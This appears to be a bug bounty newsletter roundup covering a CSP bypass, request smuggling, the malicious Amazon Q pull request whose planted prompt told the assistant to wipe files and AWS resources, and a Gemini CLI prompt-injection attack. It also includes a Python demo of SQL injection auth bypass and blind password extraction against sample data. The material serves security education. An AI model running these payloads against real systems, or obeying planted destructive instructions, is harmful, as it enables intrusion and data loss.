Nonce CSP bypass using disk cache, ‘quiet side channel’ for request smuggling, Amazon Q and the malicious pull request – ethical hacker news roundup

August 22, 2025

Disk cache in the context of a nonce CSP bypass

First up in our latest roundup is Jorian Woltjer’s bypass of a nonce-based Content Security Policy “in a pretty realistic scenario”, accompanied by an XSS challenge demonstrating the exploitation steps. His writeup’s key takeaway, the researcher suggests, is that “you can force loading [of] any page from disk cache by triggering bfcache while having a reference to the page”. 🧐

Contrary to popular opinion, the most effective HTTP smuggling exploits don’t necessarily require “complex header tricks or broken protocol parsing”, according to security researcher d3d. Instead, he writes (in a pleasingly punchy style), “a simple misalignment in expectations between front-end and back-end servers can be quietly exploited to build an undetectable channel. No special headers. No payload gymnastics”. The upshot? “A functioning C2 channel that rides through even the most hardened infrastructure.” 🔥


AI-powered self-destruct button

Back to third-party news of note: Amazon inadvertently merged a malicious pull request into the Amazon Q extension for VS Code, submitted by a hacker who supposedly wanted to expose Amazon’s AI “security theater”. The sabotage embedded a prompt instructing the AI assistant to wipe both local files and AWS resources and to log the deletions to /tmp/CLEANER.LOG. Amazon has now removed the extension and released an updated version, claiming no customer resources were impacted because a formatting error prevented the instruction from executing. The GitHub commit in question prompted one user to observe wryly: “That's how AI gets rid of tech debt”. The issue was covered by 404 Media (paywall) and, later, Last Week in AWS. 👀


Described by one redditor as “f!#*ing unsettling” given the scramble to integrate LLMs into modern applications, Tracebit researchers discovered an attack on Google Gemini CLI, a command-line AI workflow tool, in which, owing to “a toxic combination of improper validation, prompt injection and misleading UX, inspecting untrusted code consistently leads to silent execution of malicious commands”. The attack foundered on “multiple layers of protections” when mounted against rival AI code tools. 🔒

Before we conclude with our own humble output, here’s some more notable recent research that we’ve spotted:

📍 Would you like an IDOR with that? Leaking 64 million McDonald’s job applications – Ian Carroll

📍 ‘Schizophrenic’ zip files: different contents depending on your archive reader – hackArcana

📍 Broken authorization in APIs: introducing Autoswagger – Daniel Andrew, head of security, Intruder

📍 Why XSS persists in this frameworks era? – Canalun

📍 From Blind XSS to RCE: When headers became my terminal – Mahmoud El Manzalawy

Vulnerability vectors

SQL injection vulnerabilities continue to emerge and evolve despite the introduction of defences such as prepared statements and object–relational mappers (ORMs). 💉 The inaugural article of our ‘Vulnerability Vectors’ series walks you through basic and advanced SQL injection (SQLi) techniques, including blind SQLi, time-based attacks and out-of-band (OOB) callbacks. 🚀
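As an added illustration for this roundup (not code from the Vulnerability Vectors article), the Python snippet below shows both ends of that story: the same login check written with string concatenation and with a prepared statement, and a boolean-based blind SQLi loop that recovers a password one character at a time from the vulnerable version while the parameterised one shrugs off the same input. The in-memory SQLite table, usernames and passwords are constructed sample data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (assumption): a throwaway in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cr3t"), ("alice", "wonderland")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String concatenation: attacker-controlled text is parsed as SQL syntax.
    query = (
        f"SELECT 1 FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Prepared statement: the same input is bound as data and can never
    # change the structure of the query.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def blind_extract_password(conn: sqlite3.Connection, target_user: str,
                           max_len: int = 32) -> str:
    """Boolean-based blind SQLi against login_vulnerable().

    The application only reveals success or failure, so each request asks a
    yes/no question about one character of the target's password. Each guess
    closes the username literal, ORs in our condition, and comments out the
    rest of the original WHERE clause with `-- `.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                f"' OR (username = '{target_user}' "
                f"AND substr(password, {position}, 1) = '{ch}') -- "
            )
            if login_vulnerable(conn, payload, "irrelevant"):
                recovered += ch
                break
        else:
            # No character matched: we have run past the end of the password.
            break
    return recovered


def demo() -> dict:
    """Run the three checks against the constructed database."""
    conn = make_db()
    bypass = "admin' -- "  # classic auth bypass: comments out the password check
    return {
        "vulnerable_bypassed": login_vulnerable(conn, bypass, "wrong"),
        "safe_bypassed": login_safe(conn, bypass, "wrong"),
        "safe_legit": login_safe(conn, "admin", "s3cr3t"),
        "blind_extracted": blind_extract_password(conn, "admin"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The blind loop is deliberately naive (a linear scan of a small alphabet rather than a binary search on character codes, and no time-based or OOB variant, since SQLite has no sleep or network primitives); the point is that a single boolean oracle is enough to read arbitrary column data, which is why “the query never echoes results” is no defence. Only the prepared-statement version withstands the same inputs.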

Making the invisible visible

Are you equipped with the intel-gathering skills – such as port scanning, subdomain enumeration or HTTP fingerprinting – that you need to thrive as a hunter? 🤔 We’ve wrapped up our recon series with a recap of six articles covering walk-throughs for implementing methodologies that form the bedrock of effective vulnerability research. 💡

Whether you attended leHACK and want to relive the event or you’re curious to learn more about live Bug Bounties, you may be interested in watching highlights of our recent live hacking event from leHACK 2025 below.

Bug Bounteous

Swiss Post, Switzerland’s national postal service, is offering rewards of up to €230,000 per valid report – and even medium-tier reports are pegged at €40,000! – as part of its annual Public Intrusion Test. Write-in fields are in scope for the first time. Only two days remain, however, with the time-limited event concluding on 24 August. 🚀 🆕

Two episodes of Talkie Pwnii have materialised since the last Bug Bounty Bulletin. First, Pwnii explored advanced features and customisation for Caido, including the use of the plugins QuickSSRF, AuthMatrix, YesWeCaido and Param Finder, in the concluding part of a two-part series about harnessing the web app testing tool. Then she showed how to break lxml with error-based XXE and local entities in her solution to Dojo challenge #42 (here are the best write-ups and swag winners for this challenge, entitled Hex Color Palette). The current Dojo challenge is CCTV Manager, where you are tasked with uploading malicious firmware in order to seize control of a CCTV system (active until 14 August). 📹

Alan L. (El Mago) recently dropped a deep dive on how the @YesWeHack platform works – from submitting bugs to sharpening your #BugBounty skills with Dojo! Dojo, our CTF playground, helps you hack smarter with practical labs & vuln walkthroughs, as this respected hacker and popular YouTuber explains… 💡

Four new writeups of hunter interviews to flag (on our blog; they first featured on our YouTube channel): Bug Bounty Argentina founder lemonoftroy, who recounted how he became hooked on hacking; his compatriot, g4mb4, for whom patience is one of three foremost virtues when it comes to hacking; leorac, who offered tips on keeping your morale up when you hit an inevitable dry spell; and Polish YouTuber Gregxsunday, the brains behind the Bug Bounty Reports Explained YouTube channel and podcast. 🤩

Drak3hft7 has continued his meteoric rise up our leaderboards and stormed into first place in our third-quarter rankings – unseating the perennial and all-time #1 Rabhi. The Italian hunter, whom we interviewed last year, has now climbed to an all-time position of #6, up from #10 just a month ago! Bravo. Kudos also to Swiss all-time #2 Xel in second, France-based Supr4s in fourth and Algeria-based djamel-ghorab in fifth. Rabhi, meanwhile, remains unassailable atop the all-time leaderboard.

🤘Live Bug Bounty in Berlin imminent🤘

Fresh from our Black Hat USA debut, we now turn our attention to exhibiting (and in one imminent case, hosting a live Bug Bounty) at:

📍 CESIN (Club des Experts de la Sécurité de l’Information et du Numérique) – Louveciennes, 29 August

📍 Nullcon Berlin – Berlin, 4-5 September. We’re hosting a live Bug Bounty event – target to be unveiled on-site!🎯

📍 INDOSEC – Jakarta, 16-17 September, booth E8

📍 ROOTCON – Philippines, 24-26 September, booth G1

📍 it-sa Expo&Congress – Nuremberg, 7-9 October

And that’s it for this month… and, in fact, for next month too: henceforth we’re alternating monthly issues of the two newsletters that spawn these blog posts and the roundups aimed at CISOs. So CrowdSecWisdom, the newsletter aimed at CISOs, security teams and security-conscious devs, will be published in September, and the next Bug Bounty Bulletin will land in October. Enjoy the last of the summer! 👋

Read this monthly roundup of content aimed at ethical hackers even sooner by subscribing to Bug Bounty Bulletin.

Are you a CISO, other security professional or security-conscious dev? Check out our CISO-focused sister newsletter, CrowdSecWisdom – bringing you news, insights and inspiration around offensive security topics like Bug Bounty, vulnerability disclosure and management, pentest management and attack surface protection.